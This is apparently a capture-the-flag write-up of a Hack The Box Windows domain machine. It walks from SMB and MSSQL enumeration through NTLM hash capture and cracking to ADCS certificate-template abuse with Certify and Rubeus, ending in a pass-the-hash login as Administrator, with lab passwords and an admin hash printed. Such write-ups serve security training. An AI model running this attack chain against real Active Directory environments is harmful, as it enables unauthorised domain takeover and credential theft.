As we get deep into this engagement, I’ll demonstrate my penetration testing methodology and my thoughts while exploiting and scanning the target, where I perform various techniques and go through trial and error while pentesting.

INITIAL RECONNAISSANCE

As always and before we start enumeration or scanning we must check that the target is up and running by sending ICMP Requests to it by pinging it with the following command:

Next we scan with nmap for open ports and the services used:

nmap -sC -sV 10.129.228.253 -Pn -oA initial

Completed NSE at 16:05, 0.00s elapsed
Nmap scan report for 10.129.228.253
Host is up (0.040s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025–10–13 05:04:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025–10–13T05:05:30+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024–01–18T23:03:57
| Not valid after: 2074–01–05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025–10–13T05:05:31+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024–01–18T23:03:57
| Not valid after: 2074–01–05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025–10–13T04:50:58
| Not valid after: 2055–10–13T04:50:58
| MD5: d019:6a38:fa4f:5b3c:353a:44f4:c8dd:3064
|_SHA-1: a40f:bfee:dd73:bb77:a7d0:23b4:43d7:2343:cfa0:2249
|_ssl-date: 2025–10–13T05:05:30+00:00; +8h00m01s from scanner time.
| ms-sql-ntlm-info: 
| 10.129.228.253:1433: 
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info: 
| 10.129.228.253:1433: 
| Version: 
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025–10–13T05:05:31+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024–01–18T23:03:57
| Not valid after: 2074–01–05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025–10–13T05:05:31+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024–01–18T23:03:57
| Not valid after: 2074–01–05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
| date: 2025–10–13T05:04:53
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s

IDENTIFICATION
PORTS EXAMINATION AND ENUMERATION:

netexec smb 10.129.228.253:

By identifying the SMB version and enumerating we can see that the version and build of the target is :

Windows 10 / Server 2019 Build 17763 x64 domain:sequel.htb

Next lets list the shares :

smbclient -N -L //10.129.228.253

After a little bit of enumeration I’ve found an interesting clue:

from this share I found this PDF: SQL Server Procedures.pdf
which seems interesting to examine.

Apparently the PDF is mentioning that there was incidents in the SQL Server and the following username and password where noted:

For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .
Refer to the previous guidelines and make sure to switch t

Since we have the lead from the PDF file I’m going to skip to the SQL database approach until I find another way.

PORT 135/TCP:
RPC

PORT 139/TCP:
SMB over NetBIOS

PORT 3269/TCP:
Microsoft Global Catalog SSL

PORT 593/TCP:
RPC Mapper Service

PORT 389/TCP:
LDAP

PORT 88/TCP:
Kerberos

PORT 636/TCP:
LDAP / LDAPS

PORT 1433/TCP:
Microsoft SQL Server

PORT 464/TCP:
Kerberos

PORT 3268/TCP
Microsoft Global Catalog

Dissecting Microsoft SQL Server Port and Service :

PORT 1433/TCP:
Microsoft SQL Server

nmap scan:

└──╼ [★]$ nmap -sS -p 1433 10.129.228.253 -oA SQL
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-12 17:17 CDT
Nmap scan report for sequel.htb (10.129.228.253)
Host is up (0.041s latency).
PORT     STATE    SERVICE
1433/tcp filtered ms-sql-s

SQL Enumeration :

Bug in ms-sql-dac: no string output.
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password: 
|_ 10.129.228.253:1433: 
| ms-sql-hasdbaccess: 
| 10.129.228.253:1433: 
|_ ERROR: No login credentials.
| ms-sql-config: 
| 10.129.228.253:1433: 
|_ ERROR: No login credentials
| ms-sql-info: 
| 10.129.228.253:1433: 
| Version: 
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info: 
| 10.129.228.253:1433: 
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-dump-hashes: 
|_ 10.129.228.253:1433: ERROR: No login credentials
| ms-sql-xp-cmdshell: 
|_ (Use - script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
| ms-sql-tables: 
| 10.129.228.253:1433: 
| [10.129.228.253:1433]
|_ ERROR: No login credentials.

Using Metasploit Modules for enumeration and discovery:

From this method I didn’t find anything worth it, next I’d use sqlcmd to access the SQL Database using the credentials given in the PDF file:

sqlcmd -S 10.129.228.253 -U PublicUser -P GuestUserCantWrite1

this command wasn’t ideal, the better tool would be mssqlclient from impacket, we can use it using the following command:

└──╼ [★]$ /usr/bin/impacket-mssqlclient  sequel.htb/PublicUser:[email protected]

Login to MSSQL :

Next I’d enumerate the databases with the following command:

INITIAL ACCESS:

Next I’d use responder to capture responses and challenges with the following steps:

Now we are listening for events, lets trigger it next:

and there we go, NTLMv2-SSP Hash was captured:

Yush! password CRACKED! , the password for that hash was :

REGGIE1234ronnie , that belongs to the sql_svc user:

Next I’d use the credentials to access the Windows machine via EvilwinRM as follows:

after digging a bit into the files in the box I’ve found an interesting file called ERRORLOG.BAK:

to read it I’d type : ```type ERRORLOG.BAK```

By examining the log file I found a possible password in the logs called :

NuclearMosquito3

Lets try to access Ryan User on the machine by using EvilWinRM to our advantage by providing the credentials :

And there we go a shell as Ryan.Cooper via Evil-WinRM

next to get admin I’d do some enumeration, using netexec:

sudo netexec ldap 10.129.228.253 -u ryan.cooper -p NuclearMosquito3 -M adcs

ADCS 10.129.228.253 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.129.228.253 389 DC Found CN: sequel-DC-CA

I found out that ADCS is running which means we can run certipy to enumerate and abuse the certificate service:

Next I’d run the following command to enumerate the current user:

.\Certify.exe find /vulnerable /currentuser

The output of this command is :

[*] Action: Find certificate templates
[*] Using current user’s unrolled group SIDs for vulnerability checks.
[*] Using the search base ‘CN=Configuration,DC=sequel,DC=htb’
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
 DNS Hostname : dc.sequel.htb
 FullName : dc.sequel.htb\sequel-DC-CA
 Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
 Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
 Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
 Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
 Cert Start Date : 11/18/2022 12:58:46 PM
 Cert End Date : 11/18/2121 1:08:46 PM
 Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
 UserSpecifiedSAN : Disabled
 CA Permissions :
 Owner: BUILTIN\Administrators S-1–5–32–544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1–5–11
 Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1–5–32–544
 Allow ManageCA, ManageCertificates sequel\Domain Admins S-1–5–21–4078382237–1492182817–2568127209–512
 Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1–5–21–4078382237–1492182817–2568127209–519
 Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
 Template Name : UserAuthentication
 Schema Version : 2
 Validity Period : 10 years
 Renewal Period : 6 weeks
 msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
 mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
 Authorized Signatures Required : 0
 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
 mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
 Permissions
 Enrollment Permissions
 Enrollment Rights : sequel\Domain Admins S-1–5–21–4078382237–1492182817–2568127209–512
 sequel\Domain Users S-1–5–21–4078382237–1492182817–2568127209–513
 sequel\Enterprise Admins S-1–5–21–4078382237–1492182817–2568127209–519
 Object Control Permissions
 Owner : sequel\Administrator S-1–5–21–4078382237–1492182817–2568127209–500
 WriteOwner Principals : sequel\Administrator S-1–5–21–4078382237–1492182817–2568127209–500
 sequel\Domain Admins S-1–5–21–4078382237–1492182817–2568127209–512
 sequel\Enterprise Admins S-1–5–21–4078382237–1492182817–2568127209–519
 WriteDacl Principals : sequel\Administrator S-1–5–21–4078382237–1492182817–2568127209–500
 sequel\Domain Admins S-1–5–21–4078382237–1492182817–2568127209–512
 sequel\Enterprise Admins S-1–5–21–4078382237–1492182817–2568127209–519
 WriteProperty Principals : sequel\Administrator S-1–5–21–4078382237–1492182817–2568127209–500
 sequel\Domain Admins S-1–5–21–4078382237–1492182817–2568127209–512
 sequel\Enterprise Admins S-1–5–21–4078382237–1492182817–2568127209–519
Certify completed in 00:00:10.9711246

Next I’d run the following command:

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

Next as outlined in the output to convert the certificate I would run the following command :

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out cert.pfx

Next I’ll upload Rubeus.exe and the edited Cert.pfx file to the target and run Rubeus to get a TGT as Administrator:

.\Rubeus.exe asktgt /user:administrator /certificate:C:\Programdata\cert.pfx /password:1234

Ownership :

next I’d run Rubeus again to get the NTLM Admin Hash:

.\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap /password:1234

as we can see here the NTLM hash is shown at the end:

next I’d access the box with the Admin NTLM hash with the following command:

evil-winrm -i 10.129.228.253 -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE```

and here we can find the root file and read it to get the flag:

Thank you all for reading my writeup and hope you learned something and found my steps useful, if you like to support my journey, please clap and share this article.

Appreciate you all.